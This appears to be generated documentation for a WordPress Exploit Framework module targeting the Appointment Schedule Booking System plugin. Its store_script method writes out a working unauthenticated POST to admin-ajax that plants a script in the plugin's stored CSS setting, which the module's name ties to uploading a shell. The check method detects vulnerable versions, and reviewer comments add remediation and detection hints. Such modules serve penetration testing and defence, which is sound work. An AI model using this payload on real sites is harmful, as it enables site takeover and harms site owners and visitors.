class Wpxf::Exploit::AppointmentScheduleBookingSystemStoredXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb, line 6
# Sets up the module and registers its descriptive metadata (name, credits,
# advisory references and date) through update_info.
#
# Apart from the call to super, this method only passes static values along.
# The WPVDB entry and the linked advisory are the authoritative place to
# confirm affected and fixed plugin versions when triaging an installation.
def initialize
  super

  credits = [
    'White Fir Design', # Disclosure
    'rastating'         # WPXF module
  ]

  advisories = [
    ['WPVDB', '8634'],
    ['URL', 'https://www.pluginvulnerabilities.com/2016/10/03/persistent-cross-site-scripting-xss-vulnerability-in-wordpress-appointment-schedule-booking-system/']
  ]

  update_info(
    name: 'Appointment Schedule Booking System Unauthenticated Stored XSS Shell Upload',
    author: credits,
    references: advisories,
    date: 'Oct 04 2016'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb, line 23
# Delegates to the readme-based version check for the
# 'wp-appointment-schedule-booking-system' plugin and returns its result.
#
# NOTE(review): '1.1' is presumably the first fixed release, so installs
# reporting a lower version would be flagged -- confirm against
# check_plugin_version_from_readme.
# A readme version can be stale or removed, so an inventory of the installed
# plugin files is the more reliable source when auditing a site.
def check
  plugin_slug = 'wp-appointment-schedule-booking-system'
  version_bound = '1.1'
  check_plugin_version_from_readme(plugin_slug, version_bound)
end
store_script() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb, line 31
# Posts the script include to the admin-ajax URL as the value of the plugin's
# front-end CSS setting and returns whatever execute_post_request returns.
#
# Defensive context: the module name describes this as unauthenticated, and
# the body built here carries no nonce or credential field. The value is
# submitted as CSS but begins by closing the style element, which only has an
# effect if the plugin prints the saved value into the page unescaped
# (inferred from the payload shape -- the plugin code is not shown here).
# Plugin-side remediation is a capability and nonce check on the
# 'appointgen_save_cssfixfront' handler plus sanitising the stored CSS on save
# and output. For detection, POSTs to the admin-ajax endpoint with this action
# from sessions that are not logged in, or CSS values containing markup, are
# worth alerting on.
def store_script
  target = wordpress_url_admin_ajax
  form_fields = {
    'action' => 'appointgen_save_cssfixfront',
    'cssfix' => 'front',
    'css' => "</style></style><script>#{xss_include_script}</script><style>"
  }

  execute_post_request(url: target, body: form_fields)
end
vulnerable_page() click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/appointment_schedule_booking_system_stored_xss_shell_upload.rb, line 27
# Returns a human-readable description of the affected page.
#
# NOTE(review): presumably interpolated into user-facing messages by the
# parent class -- confirm against Wpxf::WordPress::StoredXss.
#
# @return [String] the description text
def vulnerable_page
  description = 'the page containing the appointment schedule'
  description
end